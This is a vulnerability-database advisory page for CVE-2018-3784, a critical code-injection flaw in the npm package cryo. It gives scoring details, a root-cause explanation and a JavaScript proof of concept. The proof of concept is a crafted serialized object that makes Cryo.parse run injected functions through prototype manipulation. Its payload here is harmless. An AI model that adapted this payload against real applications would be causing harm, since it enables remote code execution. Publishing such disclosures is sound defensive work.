9.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2018-3784

GHSA ID

GHSA-38f5-ghc2-fcmv

EPSS Score

0.68658%

CWE

CWE-94

Published

8/21/2018

Updated

9/12/2023

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2018-3784

CVE-2018-3784: Code Injection in cryo

All versions of cryo are vulnerable to code injection due to an Insecure implementation of deserialization.

Proof of concept

var Cryo = require('cryo');
var frozen = '{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\");return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto__":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}'
var hydrated = Cryo.parse(frozen);
console.log(hydrated);

Recommendation

No fix is currently available. Consider using an alternative module until a fix is made available.

(GitHub Advisory)

9.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2018-3784

GHSA ID

GHSA-38f5-ghc2-fcmv

EPSS Score

0.68658%

CWE

CWE-94

Published

8/21/2018

Updated

9/12/2023

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
cryo	npm	<= 0.0.6

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability manifests in the deserialization logic handled by Cryo.parse. The proof of concept shows serialized data containing CRYO_FUNCTION patterns being executed as code during deserialization. This indicates the library is reconstructing functions through unsafe evaluation of untrusted input. While internal implementation details aren't visible in the advisory, the entry point Cryo.parse() is unambiguously involved in the vulnerable workflow. The critical code injection occurs when processing these serialized function definitions during parsing.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

*ll v*rsions o* `*ryo` *r* vuln*r**l* to *o** inj**tion *u* to *n Ins**ur* impl*m*nt*tion o* **s*ri*liz*tion. ## Proo* o* *on**pt ```js v*r *ryo = r*quir*('*ryo'); v*r *roz*n = '{"root":"_*RYO_R**_*","r***r*n**s":[{"*ont*nts":{},"v*lu*":"_*RYO_*UN

Reasoning

T** vuln*r**ility m*ni**sts in t** **s*ri*liz*tion lo*i* **n*l** *y *ryo.p*rs*. T** proo* o* *on**pt s*ows s*ri*liz** **t* *ont*inin* _*RYO_*UN*TION_ p*tt*rns **in* *x**ut** *s *o** *urin* **s*ri*liz*tion. T*is in*i**t*s t** li*r*ry is r**onstru*tin*

9.8

Basic Information

Concerned about an active attack path?

CVE-2018-3784: Code Injection in cryo

Proof of concept

Recommendation

9.8

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI